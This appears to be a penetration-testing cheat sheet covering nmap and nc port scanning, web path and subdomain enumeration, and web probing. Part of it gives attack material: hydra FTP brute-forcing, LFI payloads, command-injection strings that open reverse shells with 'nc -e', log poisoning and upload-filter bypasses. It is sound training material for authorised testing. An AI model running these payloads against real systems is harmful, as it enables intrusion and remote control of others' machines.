Port scanning using nmap
- Use
-vvv
on an nmap scan to increase verbosity
# TCP Scan
> TARGET=<TARGET> && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
# Vulnerability Scan
> nmap -n -sV --script vuln <TARGET> -Pn -vvv
# UDP scan
> nmap -p- --min-rate=1000 -T4 <TARGET> -Pn -sU -vvv
# Output in all formats
> nmap -p- -sC -sV -oA tcp_all_ports <TARGET>
Specific purpose scanning
FTP bruteforce
# nmap
> nmap --script ftp-brute -p 21 <TARGET> -Pn
# hydra
> hydra -C /usr/share/wordlists/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp://<TARGET>
UDP 69 tftp
> nmap -n -Pn -sU -p69 -sV --script tftp-enum <TARGET>
Simple nc scanner
nc port scanner oneliner
# Normal scanning
> for p in {1..65535}; do nc -vn <TARGET> $p -w 1 -z & done 2> output.txt
# Using proxychains
> for p in {1..65535}; do proxychains -q nc -vn <TARGET> $p -w 1 -z & done 2> output.txt
nc port scanner script
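#!/bin/bash
# Sequential TCP port sweep of one host using bash's /dev/tcp pseudo-device.
#
# Usage:   ./scan.sh <host>
# Outputs: "port N is open" on stdout for every port that accepts a connection,
#          then "Done".
# Returns: 0 after the sweep; exits 1 with a usage message when <host> is missing.
host=${1:?usage: ${0##*/} <host>}

for port in {1..65535}; do
  # The host and port are passed to the inner bash as positional arguments
  # instead of being interpolated into the -c command string, so a host value
  # containing shell metacharacters cannot be executed as code.
  # A connect that fails or exceeds the 0.1 s timeout returns non-zero and the
  # port is skipped; bash's "Connection refused" noise is deliberately dropped.
  if timeout .1 bash -c 'echo >"/dev/tcp/$1/$2"' _ "$host" "$port" 2>/dev/null; then
    echo "port $port is open"
  fi
done
echo "Done"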
Web path discovery
General tips
- Some mis-spelled paths may give a hint.
- Don’t forget to vuln-search using google.
- When GET doesn’t give anything, try POST
- If nothing answers on http, try https
dirb
# Using a common wordlist
> dirb http://<TARGET>
> dirb http://<TARGET> /usr/share/wordlists/dirb/common.txt
# Using a bigger wordlist
> dirb http://<TARGET> /usr/share/wordlists/dirb/big.txt
# Amplify the search with these extensions
> dirb http://<TARGET> /usr/share/wordlists/dirb/big.txt -X .php,.txt,.json,.html
# Recursive search
> dirb http://<TARGET> -r
# Other recommended wordlists
* /usr/share/wordlists/SecLists/Discovery/Web-Content/CGIs.txt
* /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
dirsearch
> dirsearch -u http://<TARGET> -e php,asp,aspx,jsp,js,html,txt,sql -w /usr/share/wordlists/dirb/common.txt -f -r
-e EXTENSIONS, --extensions=EXTENSIONS Extension list separated by comma (Example: php,asp)
-f, --force-extensions Force extensions for every wordlist entry (like in DirBuster)
-r, --recursive
ffuf
> ffuf -w /usr/share/wordlists/dirb/big.txt -H "Content-Type: application/json" -H "Cookie:..." -X POST -u http://url/ -d '{"FUZZ": "value"}' -mc all -fr "specific_term" -c -v
wfuzz
> wfuzz -z file,/usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt --sc 200 http://<TARGET>/FUZZ
Subdomain enumeration
gobuster
> gobuster -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt vhost -u http://<TARGET>
wfuzz
> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://<TARGET>/" -H "Host: FUZZ.<TARGET>" --hl 107
* /usr/share/wordlists/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt
ffuf
> ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://<TARGET>/ -H "Host: FUZZ.<TARGET>" -fl 10
Web probing
curl
# basic-auth
> curl --user <user>:<pass> <TARGET>:<port>/pwn.php
# find all text on a page
> curl http://<TARGET>/ | html2text
# parse href in curl response
> curl http://<TARGET>/ | sed -n 's/.*href="\([^"]*\).*/\1/p'
> curl <TARGET> -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'
lfi
# lfi via php filter
> curl http://<TARGET>/index.php?m=php://filter/convert.base64-encode/resource=index
# lfi via string injection
> http://<TARGET>/index.php?page='.system('ls').'
cmd injection
${IFS}
can be used as a space on Linux targets
> nc${IFS}<TARGET>${IFS}<PORT>${IFS}-e${IFS}bash
%0a
can be used as a newline against IE and improperly sanitised web apps
> index.php?page=user%0a<cmd-payload>
;
can be used to chain another command
aaaa;nc+-e+/bin/sh+<TARGET>
- Apache log poisoning: write through User-Agent or URL into the log file and achieve RCE through LFI
- Use burp to avoid encoding issues
- HTTP headers may be spoofable, e.g.
X-Forwarded-For: 127.0.0.1
sqlmap
# get
> sqlmap -u http://<TARGET>/login.php?search=test
# post
> sqlmap -u http://<TARGET>/login.php?login=true -p user,password --data "user=1&password=2" --method POST
Image upload
- Some upload handlers only check the extension: change the extension before uploading, then capture the request and change the filename parameter in the request body.
- It is preferable to use png where possible, because the format is cleaner than jpg/jpeg
svn
- Useful when you find an svn repo exposed over the web
# get commit logs
> svn log --username admin --password admin http://<TARGET>/svn/dev/
# show differences
> svn diff -r 3:1 --username admin --password admin http://<TARGET>/svn/dev/
Exploits Search
Useful references